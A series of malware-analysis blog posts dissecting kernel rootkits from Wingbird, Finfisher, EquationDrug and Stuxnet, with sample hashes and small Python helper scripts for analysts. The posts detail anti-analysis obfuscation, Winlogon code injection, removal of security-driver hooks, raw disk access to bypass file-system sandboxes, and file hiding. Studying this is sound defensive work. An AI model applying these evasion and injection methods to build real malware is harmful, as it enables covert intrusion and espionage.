Wingbird rootkit analysis

January 7, 2017, 9:54 am

In previous blog posts I described rootkits that so-called state-sponsored actors have used to infect their victims, keep malware persistent and obtain SYSTEM privileges on a system. I mentioned the Remsec (Cremes) rootkit used by the Strider (ProjectSauron) cybergroup and the Sednit rootkit of the APT28 (Fancy Bear) group. The Remsec rootkit was used by its operators to execute their code in kernel mode with an SMEP bypass and was developed in its own original style, whereas the Sednit authors developed their rootkit to hide malware activity and footprints from the user in the "usual rootkit manner".

Recently a security company that investigates the activity of various cybergroups shared two rootkit droppers with me. The analysis surprised me, because both the rootkits and their droppers are well protected against analysis. Analyzing both rootkits took considerable time, because they contain various anti-research capabilities. Code obfuscation and a large number of garbage instructions significantly increase the size of the rootkit and dropper files. Moreover, both rootkits belong to one cybergroup, were developed in a targeted manner and are intended for specific victims.

The concept of "targeted" has long been discussed in the AV and security community as an attribute of sophisticated cyberattacks, which often have state-sponsored origins. In the past we saw many cyberespionage operations that used unique executable files developed for specific victims and the software they use. The malware described in this blog post satisfies all the requirements that researchers set for highly targeted cyberattacks of possibly state-sponsored origin. I'm sure that this malware is part of a larger cyberespionage platform.

This malware, as well as the cyber espionage group that leverages it, was mentioned by Microsoft MMPC in their blog post and in Security Intelligence Report Volume 21 here. The group is called NEODYMIUM, while the malware is called Wingbird. Wingbird shares similarities with another well-known commercial cyber espionage toolkit called Finfisher, which Symantec detects as Backdoor.Finfish.

Dropper 1

The first dropper has the following characteristics.

The dropper is well protected from various methods of static and dynamic analysis. It contains various anti-disassembly, anti-debugging, anti-VM and anti-dump features.
The dropper contains heavily obfuscated code with jumps into the middle of instructions, garbage instructions, useless checks, useless jumps, etc.
Because of the many garbage instructions, the dropper is fairly large (1.3 MB).
The dropper is designed to delay its analysis for as long as possible.
It installs the rootkit into the system.
It drops the rootkit into a file named logonsrv.dat.
It is intended only for dropping the rootkit.

The high entropy level of the .text section is an indicator that the code is encrypted and obfuscated.
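As a rough illustration of what "high entropy" means here, the following minimal sketch computes the Shannon entropy of a byte buffer in bits per byte. It is not taken from any tool used in the analysis; the function name and the two sample buffers are assumptions made for the example. Plain compiled code usually scores noticeably lower than encrypted or packed data, which approaches the maximum of 8.

```python
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Return the Shannon entropy of data in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    total = len(data)
    # Sum p * log2(1/p) over every byte value that occurs in the buffer.
    return sum((n / total) * math.log2(total / n) for n in Counter(data).values())


# Illustrative inputs only: a buffer of one repeated byte and a buffer
# in which all 256 byte values occur equally often.
low = shannon_entropy(b"\x90" * 4096)
high = shannon_entropy(bytes(range(256)) * 16)
```

In practice the function would be applied to the raw bytes of a section, and a value close to 8 is only a hint that the content is encrypted or compressed, not proof.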

The dropper and the rootkit contain a timestamp in the PE header that looks legitimate.
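For readers who want to check such a timestamp themselves, here is a small sketch that reads the TimeDateStamp field of IMAGE_FILE_HEADER with the standard library only. The helper `build_stub` is hypothetical and exists just to produce a synthetic header for the example; it does not create a loadable PE file.

```python
import struct
from datetime import datetime, timezone


def pe_timestamp(image: bytes) -> datetime:
    """Read TimeDateStamp from the IMAGE_FILE_HEADER of a PE image."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    # e_lfanew at offset 0x3C points to the "PE\0\0" signature.
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("PE signature not found")
    # After the signature: Machine (2 bytes), NumberOfSections (2), TimeDateStamp (4).
    (stamp,) = struct.unpack_from("<I", image, e_lfanew + 8)
    return datetime.fromtimestamp(stamp, tz=timezone.utc)


def build_stub(stamp: int) -> bytes:
    """Build a synthetic DOS header plus file header for demonstration only."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    file_header = struct.pack("<HHI", 0x014C, 1, stamp)
    return bytes(dos) + b"PE\x00\x00" + file_header
```

A plausible-looking date is only a weak signal, because the field can be set to any value when the file is built or patched afterwards.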

Typical end of a function in the dropper.

All functions lead to the same code.

This code is heavily obfuscated and contains useless jumps.

The characteristics of the Ring 0 rootkit are listed below.

The rootkit code is heavily obfuscated, making its static analysis almost impossible.
The rootkit contains encrypted code and data.
It does not create a device object and does not communicate with Ring 3 code.
It does not set any hooks in the Windows kernel.
It is intended only for covert injection of malicious code into the trusted Winlogon process.
The rootkit creates a copy of itself in an allocated pool region, which also contains heavily obfuscated code.
It uses self-modifying code; for example, it can patch important call or jmp instructions with another address or another register.
It is designed to stay as hidden as possible and unloads its driver after the code has been injected into Winlogon.
It checks for the presence of the ESET Helper Driver (ehdrv.sys) in the system and removes its SSDT (KiServiceTable) hooks.

Before doing its main work, the rootkit prepares its own code for execution.

It allocates two non-paged buffers: one of size 0x56000 for its driver and a second of size 0x10000.
The first buffer stores a newly created in-memory driver that will do all the necessary work, and the second buffer holds trampolines to the NT kernel API.
The rootkit builds its IAT with 0x2F items, located in a section of the new driver. Instead of using this IAT directly, however, the rootkit code takes these addresses and uses them to modify instructions and variables in the code in the second pool region.

It is worth noting that the rootkit authors took all possible steps to complicate analysis of the rootkit in memory. Even advanced users will have trouble detecting it with anti-rootkit tools.

The rootkit does not use its original image logonsrv.dat to perform its main malicious tasks.
The rootkit does not rely on a contiguous IAT buffer in memory, which would simplify its analysis.
The rootkit does its main work from two allocated memory (pool) blocks with self-modifying code. One of these blocks is used as a special trampoline for NT kernel API calls.
It calls the KeDelayExecutionThread function before doing its main work, i.e. before injecting code into Winlogon.

Below you can see code from the second allocated buffer (size 0x10000), which contains trampolines to the NT API functions imported by the rootkit. Other code from the created driver (in the first buffer) rewrites instructions in these trampolines with addresses from the IAT.
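To make the idea of rewriting a trampoline with a resolved address more concrete, here is a simplified user mode simulation. It assumes a 32-bit x86 near jmp or call with a rel32 operand; the exact instruction forms used by the rootkit are not shown in the text, and the function names and addresses are hypothetical.

```python
import struct


def patch_rel32(code: bytearray, offset: int, base: int, target: int) -> None:
    """Rewrite the rel32 operand of an E8 (call) or E9 (jmp) at `offset`.

    `base` is the virtual address at which `code` is assumed to be mapped.
    """
    if code[offset] not in (0xE8, 0xE9):
        raise ValueError("expected a near call or jmp opcode")
    next_ip = base + offset + 5             # address of the following instruction
    rel = (target - next_ip) & 0xFFFFFFFF   # wrap to 32 bits for backward targets
    struct.pack_into("<I", code, offset + 1, rel)


def resolve_target(code: bytes, offset: int, base: int) -> int:
    """Compute the absolute destination encoded by the instruction at `offset`."""
    (rel,) = struct.unpack_from("<i", code, offset + 1)
    return (base + offset + 5 + rel) & 0xFFFFFFFF
```

An analyst can use the same arithmetic in reverse: once a dump of the trampoline buffer and its base address are available, `resolve_target` recovers which kernel address each patched trampoline actually reaches.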

After the preliminary actions are complete, the rootkit calls ZwOpenKey to open its registry key and reads the value of the ImagePath parameter with ZwQueryValueKey. Between the two calls the rootkit modifies its own instructions, as shown below.

After the call to ZwQueryValueKey, the code is modified again in order to call PsCreateSystemThread.

The rootkit creates two threads with the PsCreateSystemThread API, and one of them performs the main malicious work. Below you can see the scheme of rootkit execution. It prepares the code that will be injected into Winlogon and reads the \KnownDlls\ntdll.dll section, which gives easy access to the contents of the Ntdll library. The rootkit also imports the KeServiceDescriptorTable variable to get the address of KiServiceTable and restore items in this table.

It seems that only one function in the rootkit body was not obfuscated. This function enumerates system modules. The rootkit code calls it several times: to get the NT kernel base address, to get the Ntdll base address and to check for the presence of the ESET helper driver (ehdrv.sys). As you can see above, the authors take an interest in the NT kernel files because they need to restore the original SSDT functions.

It is interesting to note that the authors used the same scheme to obfuscate the rootkit driver as they did for the dropper. We can find the same function construction inside the rootkit body.

As you can see in the image above, all functions again lead to the same code, which is obfuscated with garbage instructions.

It is also interesting that the startup code in both the dropper and the driver is not obfuscated. Considering this fact and the information above, it seems that the driver and the dropper were obfuscated with one tool that runs before the compiler generates code, i.e. at the source code level.

The rootkit allocates three buffers in the Winlogon process: the first of size 0x100000, the second 0x3000 and the third 0x48000. The following Ntoskrnl functions are used by the rootkit.

Dropper 2

The following characteristics relate to the second dropper.

Like the first dropper, this dropper is well protected from various methods of static and dynamic analysis.
The dropper has the same size, 1.3 MB.
The dropper drops a Ring 0 rootkit into a file named ndisclient.dat.

Some information about the dropper's behaviour.

Some characteristics of the driver.

It is designed to communicate with a user mode client through the device \Device\PhysicalDrive00 and its symbolic link \DosDevices\PhysicalDrive00.
It is smaller than the driver from the first dropper (43 KB vs 372 KB).
It registers three IRP dispatch entry points, for IRP_MJ_CREATE, IRP_MJ_CLOSE and IRP_MJ_DEVICE_CONTROL requests.
The rootkit checks for the presence of the drivers \Driver\diskpt (Shadow Defender, shadowdefender.com) and \Driver\DfDiskLow, DfDiskLow.sys (Deep Freeze, Faronics Corp).
It contains code that parses the object manager namespace via the functions ZwOpenDirectoryObject and ObQueryNameString.
It contains obfuscated, self-modifying code that is hard to analyze both statically and dynamically.
The authors have provided a DriverUnload function.
The rootkit is intended for bypassing FS sandboxes and for modifying files directly at the low hard disk level.

In DriverEntry the rootkit allocates a pool block that is used for the already familiar trampoline to the NT kernel API (as in the first driver).

Below you can see an image with the major steps of the execution flow of the rootkit's DriverEntry.

Part of the IRP_MJ_DEVICE_CONTROL handler code is presented below.

The rootkit code in DriverEntry retrieves a pointer to the device object that represents the hard disk(s) from the port driver (atapi). The code that dispatches the IRP_MJ_DEVICE_CONTROL operation subsequently uses this information to send synchronous requests to the port driver with a standard set of functions:

MmMapLockedPagesSpecifyCache, IoAllocateMdl to work with non-paged memory and direct I/O.
IoBuildSynchronousFsdRequest, IofCallDriver to build a corresponding IRP and send it to the driver.
MmUnmapLockedPages, IoFreeMdl to release resources.

Below you can see a table with the characteristics of both analyzed drivers.

Conclusion

The authors of this malware made almost every effort to hamper both static and dynamic analysis. The first rootkit serves only one purpose: to inject malicious code into the Winlogon system process. It checks for the presence of the ESET Helper Driver because of its ability to block the rootkit's malicious actions, and the attackers seem sure that their victim uses this security product. As you can see from the analysis, because of the high level of code obfuscation it is useless to show images of the rootkit code: they do not help in reconstructing the logic of its execution. The malware authors used a special tool to obfuscate the droppers and rootkits. It is not clear why the attackers did not care about the rootkit's persistence in the system or why it does not guard its own registry key.

Both rootkits are aimed at executing only one specific task: the first is used for data/code injection into Winlogon and the second for communicating with the hard drive at a low level. The rootkit from the second dropper doesn't care about its own persistence: the dropper removes its driver from disk once it has been loaded into memory. It is worth noting that the checks for specific security products correspond to the goals of both rootkits. For example, the first driver checks for the presence of an AV driver, while the second driver targets only system utilities that specialize in guarding a system from critical modifications.

Both security/system products, Shadow Defender and Faronics Deep Freeze, leverage FS sandbox methods to block potentially malicious actions against protected files in a system. This explains why the attackers need low-level disk access: they need to bypass the FS sandbox and modify the required files directly.

Finfisher rootkit analysis

January 13, 2017, 4:09 am

My previous blog post was dedicated to a very interesting piece of malware called Wingbird. This malware has been used by the NEODYMIUM cyber espionage group and contains a rootkit that executes sensitive operations important to the attackers. The first sample used a rootkit to inject malicious code into Winlogon while removing ESET driver hooks in the kernel SSDT, while the second deploys a rootkit to bypass the FS sandbox of several security products. Both droppers were analyzed in a 32-bit environment, but their behaviour on 64-bit Windows versions is interesting too and differs from what we have seen on 32-bit versions.

On a 64-bit system, the dropper doesn't resort to a kernel mode rootkit (obviously, due to DSE restrictions) to inject malicious code and data into the trusted Winlogon process. Instead, it uses a special trick to mask its malicious activity and perform the injection. The dropper uses a copy of the trusted LSASS process (executable file) and forces it to load a malicious DLL with a standard name that is imported by LSASS.

The 64-bit GMER anti-rootkit tool shows injection anomalies in Winlogon and Svchost, where the malicious code is located.

The presence of virtual memory regions in Winlogon with the protection attribute PAGE_EXECUTE_READWRITE is an indicator that the process was compromised.
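The check described here can be sketched as a simple filter over a list of memory regions. The sketch below works on plain data rather than a live process; the `Region` type and the sample addresses are assumptions made for illustration, while the protection constants are the documented Windows values.

```python
from dataclasses import dataclass
from typing import List

PAGE_READWRITE = 0x04
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40


@dataclass
class Region:
    base: int      # start address of the region
    size: int      # region size in bytes
    protect: int   # protection value as reported for the region


def rwx_regions(regions: List[Region]) -> List[Region]:
    """Return regions that are readable, writable and executable at once."""
    # Modifier flags such as PAGE_GUARD live above the low byte, so mask them off.
    return [r for r in regions if (r.protect & 0xFF) == PAGE_EXECUTE_READWRITE]


# Hypothetical snapshot of a process address space.
snapshot = [
    Region(0x00400000, 0x1000, PAGE_EXECUTE_READ),
    Region(0x01A00000, 0x100000, PAGE_EXECUTE_READWRITE),
    Region(0x02000000, 0x3000, PAGE_READWRITE),
]
hits = rwx_regions(snapshot)
```

Some legitimate software (JIT compilers, for example) also allocates such regions, so in a process like Winlogon a hit is a strong hint rather than a final verdict.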

As I already noted in the previous blog post, the Wingbird malware shares similarities with another piece of malware called Finfisher. For example, in the malicious PE file that was dumped from a Winlogon memory region, we can see a reference to the name of the Finfisher rootkit (mssounddx.sys).

After the lsass service has started, it injects code into winlogon, and with the help of ProcMon boot logging we can identify the first actions that come from the malicious code.

After some preliminary actions, the malicious code in Winlogon tries to communicate with the hard disk at a low level: it requests disk geometry information and sends a SCSI control code to read data. In the 32-bit version it uses the rootkit to perform this operation.

It also checks for the presence of Finfisher files. See details in the Symantec blog post here.

The following indicators show similarities between Wingbird and Finfisher.

I was able to get a 32-bit version of the mssounddx.sys rootkit. As you can see in the screenshot below, the authors disguised its file as a legitimate Microsoft driver.

Like the Wingbird rootkit, the Finfisher rootkit is protected from static analysis. The code of DriverEntry and other functions in mssounddx.sys is a loader that decrypts the contents of the BIN resource, where the second, encrypted driver is located.

The rootkit code performs the following actions in DriverEntry.

1. It looks for the corresponding BIN resource in the .rsrc section.

2. It allocates a memory block from the kernel pool and copies the contents of the BIN resource (the encrypted driver, size 0xc180) into it.

3. It decrypts the data in the allocated pool block.

4. It prepares the PE file of the decrypted driver for work: applies fixups and fills in some internal variables (pointers to imported functions).

5. It passes control to the DriverEntry of the decrypted driver.

The second driver uses the following kernel functions.

Code injection.

The next picture shows the logic of the second driver's execution.

The start of the shellcode looks like this.

Conclusion

As you can see from the analysis, we haven't seen anything new in the Finfisher rootkit. Like other drivers used by attackers, it is intended for only one purpose: injecting malicious code into the Winlogon process. Nevertheless, the authors use some anti-analysis tricks, including driver encryption and obfuscation of some data that the driver keeps in kernel memory.

EquationDrug rootkit analysis (mstcp32.sys)

March 30, 2017, 8:13 am

The malware arsenal used by the very sophisticated, so-called state-sponsored cyber group named "Equation Group" has already been thoroughly described by Kaspersky in their report. As always, it is hard to make assumptions about the attribution of this malware or about the origins of such an elite cyber group. In any case, it is obvious that developing the code and paying for the infrastructure for cyberattacks on such a scale took considerable human and financial resources. As regular readers of my blog may have noticed, I'm now concentrating on researching rootkits that allegedly belong to sophisticated/state-sponsored cyber actors. It is also interesting to assess the authors' driver development skills and compare their code with code from other similar "products".

Last year Equation Group was hacked by another hacking group called Shadow Brokers, who claimed to have gained access to secret sources of NSA cyber toolkits. As we already know, SB released some exploits and backdoors belonging to EG that target routers and network devices of several vendors. The latest leak from SB was dedicated to a set of PE files named EquationDrug, which Equation Group used for cyberespionage. The analyzed driver mstcp32.sys was taken from this leak.

The driver mstcp32.sys
(SHA256:26215BC56DC31D2466D72F1F4E1B6388E62606E9949BC41C28968FCB9A9D60A6) is disguised as "Microsoft TCP/IP driver".

The authors also took some steps to mask the malicious purpose of this driver. For example, if you look at its imports or dump strings from the file, you won't find anything really suspicious. The driver imports APIs from the NDIS kernel mode library NDIS.SYS to work with network packets at the physical level (which fully corresponds to its purpose). In fact, the authors hid the malicious indicators inside the driver in encrypted data. Below you can see decrypted strings from the driver's body.

As you can see from the dumped strings above, the rootkit attaches itself to the Windows network stack to capture packets at the NDIS level. It is also clear that the rootkit implements injection of malicious code into trusted Windows processes: Services.exe (SCM) and Winlogon.

Below you can see the compilation date of this driver, which indicates that it was compiled almost 10 years ago. This means that the cyber espionage group used the rootkit and was already active in 2007. The authors also wanted to keep their operations hidden from the user by putting code into Ring 0.

The timestamp from the debug directory matches its counterpart in IMAGE_FILE_HEADER.

Below you can see a screenshot of the rootkit's start code.

Decrypting the malicious data is the first step the driver takes. After that it creates a device object named \Device\Mstcp32 and performs initialization steps. The device name isn't hardcoded in the driver's body; it is formed from the driver service name (Mstcp32 is the original name).

As you can see from the image above, the driver dispatches the following IRP requests:

IRP_MJ_CREATE
IRP_MJ_CLOSE
IRP_MJ_READ
IRP_MJ_WRITE
IRP_MJ_DEVICE_CONTROL
IRP_MJ_CLEANUP.

The driver registers itself as an NDIS filter. It checks the interface with GUID {4d36e972-e325-11ce-bfc1-08002be10318} (which is located in the encrypted part of the data) and gets the list of instances already registered in Windows. It tries to find a specific instance with the value LowerRange == "ethernet" under HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e972-e325-11ce-bfc1-08002be10318}\000X\Ndi\Interfaces. Once the driver code has found it, it appends its own value to this parameter, as shown in the image below.

As I mentioned above, the rootkit was written in 2007, so the range of supported Windows versions is extremely small compared with present-day malware. Moreover, like other rootkit authors at that time, its authors use many undocumented fields in kernel mode objects to retrieve the data they need. The rootkit supports the following Windows NT versions.

Windows NT 4.0 (1381)
Windows 2000 (2195)
Windows XP (2600)
Windows Server 2003 (3790)

You can see that the rootkit uses various undocumented offsets in the EPROCESS and ETHREAD kernel objects for several purposes, including enumerating running processes and threads, checking a thread's alertable state, retrieving a pointer to the PEB, etc.

Injection of malicious code into processes is done in the manner usual for such rootkits: Attach_To_Process->Allocate_Virtual_Memory->InsertApc.

Conclusion

Unlike the authors of other state-sponsored rootkits already mentioned in my blog, the authors of mstcp32.sys don't rely on the Windows native API for some operations, for example, for enumerating processes and threads. Instead, they use undocumented kernel object offsets to retrieve the data mentioned above. A significant portion of the code in the rootkit body is NDIS-oriented and dedicated to network communication. There are many Windows kernel rules for correctly organizing communication between an NDIS driver and other parts of the OS.

The rootkit driver supports an IOCTL for sending data over the network at the NDIS level. This means that the network logic for communicating with a remote host is located in the user mode part, which uses the driver for this purpose.

Stuxnet drivers: detailed analysis

April 13, 2017, 2:36 am

A lot of time has passed since the publication of various detailed research papers about Stuxnet and its components. All top AV vendors wrote their own comprehensive papers, which reveal the major information about Stuxnet's destructive features. Some information about the Stuxnet rootkits was published by Kaspersky here, Symantec here and ESET here. However, the published information is not complete, because each of these documents covers only a specific sample of the rootkit and describes only some of its functions. For example, the Kaspersky analysis tries to summarize information about the known Stuxnet drivers, but it doesn't contain any technical details about them. The ESET report mentioned above contains information about two Stuxnet drivers, but this is not sufficient for a complete summary.

First of all, it should be made clear that from the point of view of exploring undocumented Windows kernel internals, there is nothing really interesting in the Stuxnet drivers. I mean nothing interesting compared with such advanced and sophisticated "civilian" rootkits as ZeroAccess or TDL4. Those can embed themselves deeply into a system, bypass anti-rootkits and deceive low-level disk access tools. In contrast, the authors of the Stuxnet rootkits do not use such deep persistence in a compromised system. This analysis tries to summarize technical information about the Stuxnet drivers.

As a starting point for our research, we can take the information about Stuxnet drivers already published by Kaspersky. Their analysis, Stuxnet/Duqu: The Evolution of Drivers, summarizes some information about the drivers that Stuxnet's authors used in cyber attacks.

Driver 1
File name: MRxCls.sys
SHA256: 817a7f28a0787509c2973ce9ae85a95beb979e30b7b08e64c66d88372aa3da86
File size: 19840 bytes
Signed: No
Timestamp: 2009-01-01 18:53:25
Device object name: \Device\MRxClsDvX
Main purpose: code injection
AV detection ratio: 53/61

The first driver stores sensitive text information, such as the rootkit device name and the path to its service in the registry, as encrypted data. After starting, the driver decrypts this data and we can extract it. Note that the name of the rootkit service almost matches its device object name. The first dword of the decrypted data is also interesting, because it stores flags that affect the driver's behaviour. For example, the first bit of this dword restricts the rootkit code from working in Windows safe mode, while the second is used as an anti-debug trick. If the second bit is set and ntoskrnl!KdDebuggerEnabled is active, the driver will not load.
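The flag logic can be modelled in a few lines. This is only a sketch of the decision as described in the text: it assumes that "first bit" means the least significant bit and that a set safe mode bit makes the driver refuse to work in safe mode. The constant and function names are hypothetical.

```python
FLAG_NO_SAFE_MODE = 0x1  # bit 0: assumed to mean "do not work in safe mode"
FLAG_ANTI_DEBUG = 0x2    # bit 1: refuse to load if a kernel debugger is enabled


def driver_should_load(flags: int, safe_mode: bool, kd_debugger_enabled: bool) -> bool:
    """Model the load decision derived from the first dword of the decrypted data."""
    if flags & FLAG_ANTI_DEBUG and kd_debugger_enabled:
        return False  # corresponds to the KdDebuggerEnabled check
    if flags & FLAG_NO_SAFE_MODE and safe_mode:
        return False  # assumption about how the safe mode restriction behaves
    return True
```

For an analyst this means that a sample with the anti-debug bit set simply does nothing on a machine booted with kernel debugging enabled, which is worth keeping in mind when a driver appears inert in the lab.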

The decrypted rootkit data also stores the name of the registry value (Data) that the rootkit uses to determine which files should be injected into processes. The decrypted data is stored in the following order.

\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Services\MRxCls
Data
\Device\MRxClsDvX

As the driver is registered by Stuxnet with the "boot" start type, it can't perform its whole initialization in DriverEntry, because neither the NT kernel nor the file system is yet ready to serve requests from clients. So it calls the IoRegisterDriverReinitialization API and delays its own initialization. After the rootkit's ReInitialize function gets control, it checks the Windows NT version and fills in some dynamic imports. It also performs some preparatory operations and calls PsSetLoadImageNotifyRoutine to register its own image load handler. This handler is responsible for code injection into processes. Below you can see the scheme of rootkit initialization.

The driver registers the following IRP handlers.

IRP_MJ_CREATE
IRP_MJ_CLOSE
IRP_MJ_DEVICE_CONTROL (fnDispatchIrpMjDeviceControl)

If you are not familiar with Windows NT driver development, it is worth noting that any driver that allows handles to be opened on its device registers at least two IRP handlers: IRP_MJ_CREATE to support ZwCreateFile and IRP_MJ_CLOSE to support ZwClose. Our driver supports the ZwDeviceIoControlFile interface, which is why it registers an IRP_MJ_DEVICE_CONTROL handler.

The fnDispatchIrpMjDeviceControl handler serves only one purpose: to call the undocumented Windows NT function ZwProtectVirtualMemory. To do that, the client sends the driver the special IOCTL code 0x223800 (via DeviceIoControl) and provides a special prearranged structure with the parameters for the API call. The driver uses buffered I/O.
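The IOCTL value itself can be split into its fields using the standard CTL_CODE layout (device type in bits 16 to 31, access in bits 14 to 15, function in bits 2 to 13, transfer method in bits 0 to 1). The short sketch below does that decomposition; the type and function names are chosen for this example.

```python
from typing import NamedTuple

METHODS = {
    0: "METHOD_BUFFERED",
    1: "METHOD_IN_DIRECT",
    2: "METHOD_OUT_DIRECT",
    3: "METHOD_NEITHER",
}


class IoctlFields(NamedTuple):
    device_type: int
    access: int
    function: int
    method: int


def decode_ioctl(code: int) -> IoctlFields:
    """Split a Windows I/O control code into its CTL_CODE fields."""
    return IoctlFields(
        device_type=(code >> 16) & 0xFFFF,
        access=(code >> 14) & 0x3,
        function=(code >> 2) & 0xFFF,
        method=code & 0x3,
    )


fields = decode_ioctl(0x223800)
method_name = METHODS[fields.method]
```

For 0x223800 this yields device type 0x22 (FILE_DEVICE_UNKNOWN), access 0 (FILE_ANY_ACCESS), function 0xE00 and METHOD_BUFFERED, which agrees with the observation that the driver uses buffered I/O.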

As we know, the ZwProtectVirtualMemory function is not exported by the Windows kernel, and this is another problem that the authors of MRXCLS.sys had to solve. For example, on Windows 2000 they try to find the function by a signature, analyzing the executable sections of the ntoskrnl image. You can see this signature below.

The authors enumerate all the relevant ntoskrnl sections and, for each of them, call a special function that searches for ZwAllocateVirtualMemory by signature on Windows 2000, or in a slightly more complex way on Windows XP.
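A signature search of this kind boils down to scanning section bytes for a pattern in which some positions are fixed and others may vary. The following minimal sketch shows the general technique with wildcard support. The pattern used in the example is a generic placeholder and is not the signature from the driver, which is not reproduced in the text.

```python
from typing import Optional, Sequence


def find_signature(data: bytes, pattern: Sequence[Optional[int]]) -> int:
    """Return the offset of the first match of `pattern` in `data`, or -1.

    Entries equal to None are wildcards that match any byte.
    """
    n = len(pattern)
    for start in range(len(data) - n + 1):
        if all(p is None or data[start + i] == p for i, p in enumerate(pattern)):
            return start
    return -1


# Placeholder pattern for illustration: one fixed opcode byte, four
# wildcard bytes for an immediate value, then four fixed bytes.
PLACEHOLDER = [0xB8, None, None, None, None, 0x8D, 0x54, 0x24, 0x04]
section = b"\x90\x90" + b"\xB8\x77\x00\x00\x00\x8D\x54\x24\x04" + b"\xCC"
offset = find_signature(section, PLACEHOLDER)
```

Wildcards are what make such signatures survive across builds: bytes that encode build-specific values, such as immediates or addresses, are skipped while the stable instruction bytes are compared.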

The main purpose of this Stuxnet rootkit is code injection. As we can see from its code, the driver tries to read the injection configuration data either from the registry parameter Data or from a file, if its name is present in the malware sample. In the analyzed sample, the name of the configuration file is absent. The injection configuration data is prepared by the user mode part of the malware. The injection mechanism was thoroughly described by ESET in their paper. The driver performs injection into a process in two phases: the first is preparatory and the second does the main work.

In the second phase it reads the contents of a file, decrypts it and injects it into the process address space. The names of the files to inject are stored in the configuration file or in the registry parameter Data.

As we can see from the code analysis, the authors developed the rootkit to inject malicious code into processes. The data for injection is prepared by Stuxnet's user mode code. The driver registers an image load notification handler and performs the injection in two phases. It also supports one IOCTL command for changing the protection of a process's virtual memory pages with ZwProtectVirtualMemory. To find this unexported and undocumented function in ntoskrnl, it uses a raw byte search based on special signatures.

Driver 2
File name: Mrxnet.sys
SHA256: 0d8c2bcb575378f6a88d17b5f6ce70e794a264cdc8556c8e812f0b5f9c709198
File size: 17400 bytes
Signed: Yes
Timestamp: 2010-01-25 14:39:24
Device object name: none
Main purpose: malicious files hiding
AV detection ratio: 51/61

Unlike the first driver, MRXCLS.sys, Mrxnet.sys doesn't perform anti-analysis checks in its start function. Mrxnet.sys is an FS filter driver that controls some file operations. The rootkit hides certain file types by intercepting the IRP_MJ_DIRECTORY_CONTROL request and removing information about them from the buffer.

The rootkit initialization steps.

As we can see from the code, the driver works with two types of devices: first, its own CDO (Control Device Object), which represents the FS filter, and second, devices created to filter file-related operations on specific volumes. For the CDO, the rootkit handles the well-known IRP_MJ_FILE_SYSTEM_CONTROL request and the IRP_MN_MOUNT_VOLUME operation. The Windows kernel uses this operation when a new volume is mounted in the system. On receiving this request, the rootkit creates a new device object, registers a completion routine and attaches the device to the newly mounted device. This method lets the driver monitor the appearance of new volumes in the system, for example, the volume of a removable drive.

As you can see from the picture above, the driver also calls the I/O manager API IoRegisterFsRegistrationChange to register a handler that the Windows kernel calls each time a new file system driver CDO is registered in the system. In this handler, the driver creates a new device and attaches it to the passed CDO, or removes the device when a file system driver is deleted.

The major purpose of the Mrxnet.sys driver is hiding Stuxnet's malicious files. The Windows kernel provides the ZwQueryDirectoryFile API for requesting information about the files in a directory. This API function invokes the driver's handler for the IRP_MJ_DIRECTORY_CONTROL operation. So the rootkit registers its own IRP_MJ_DIRECTORY_CONTROL handler and sets a completion routine when such a request passes through the handler. In this completion routine it analyzes the data buffer and checks the file names in it. It erases files with the extensions .LNK and .TMP from the buffer. It also imposes additional restrictions on hiding. For example, a .LNK file must have a size equal to 0x104B.
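The filtering decision made in the completion routine can be modelled in user mode as a predicate over directory entries. The sketch below is a simplification under stated assumptions: it works on (name, size) pairs instead of the real kernel buffer, and because the text does not detail the extra restrictions for .TMP files, it hides every .TMP entry. The type, function and file names are hypothetical.

```python
from typing import List, NamedTuple

LNK_HIDDEN_SIZE = 0x104B  # size that a .LNK file must have to be hidden


class DirEntry(NamedTuple):
    name: str
    size: int


def should_hide(entry: DirEntry) -> bool:
    """Decide whether a directory entry would be erased from the listing."""
    name = entry.name.upper()
    if name.endswith(".LNK"):
        return entry.size == LNK_HIDDEN_SIZE
    if name.endswith(".TMP"):
        # Simplification: the additional checks for .TMP files are not modelled.
        return True
    return False


def filter_listing(entries: List[DirEntry]) -> List[DirEntry]:
    """Return the listing as a caller would see it after filtering."""
    return [e for e in entries if not should_hide(e)]
```

In the real driver the same effect is achieved by editing the buffer returned for the directory query, so every user mode program that lists the directory receives the already filtered view.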

It should be noted that this file hiding technique was described in the famous book "Rootkits: Subverting the Windows Kernel" by Hoglund and Butler.

Driver 3
File name: Jmidebs.sys
SHA256: 63e6b8136058d7a06dfff4034b4ab17a261cdf398e63868a601f77ddd1b32802
File size: 25552 bytes
Signed: Yes
Timestamp: 2010-07-14 09:05:36
Device object name: \Device\{3093983-109232-29291}
Main purpose: code injection
AV detection ratio: 50/61

This driver is very similar to MRxCls.sys and serves only for code injection into processes. The following properties distinguish it from the original MRxCls.sys.

New device object name - \Device\{3093983-109232-29291}
New registry service name - jmidebs
New registry service parameter name (injection data) - IDE
New IOCTL code for reading (caching) configuration data
New constants in decryption routine.

Decrypted strings.

\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Services\jmidebs
IDE
\Device\{3093983-109232-29291}

The rootkit contains an additional IOCTL function that caches configuration data. This data is used for injecting malicious Stuxnet code.

Driver 4
File name: MRxCls.sys
SHA256: 1635ec04f069ccc8331d01fdf31132a4bc8f6fd3830ac94739df95ee093c555c
File size: 26616 bytes
Signed: Yes
Timestamp: 2009-01-01 18:53:25
Device object name: \Device\MRxClsDvX
Main purpose: code injection
AV detection ratio: 50/61

This sample is identical to driver 1, but is signed with a digital certificate. Both samples have an identical timestamp value in the PE header and identical code inside.

Conclusion

As we can see from the analysis, the authors of Stuxnet's Ring 0 part were interested in code injection and in hiding malicious files. The MRxCls.sys driver has two instances, one unsigned and one with a digital signature. Both drivers are identical and have the same compilation date. The Jmidebs.sys driver was compiled later than these two, and I would call it "MRxCls.sys v2", because it contains some internal differences but serves the same purpose. The Mrxnet.sys driver is a typical legacy FS filter driver that the attackers use for hiding files in Windows.

GrayFish rootkit analysis

May 17, 2017, 6:18 am

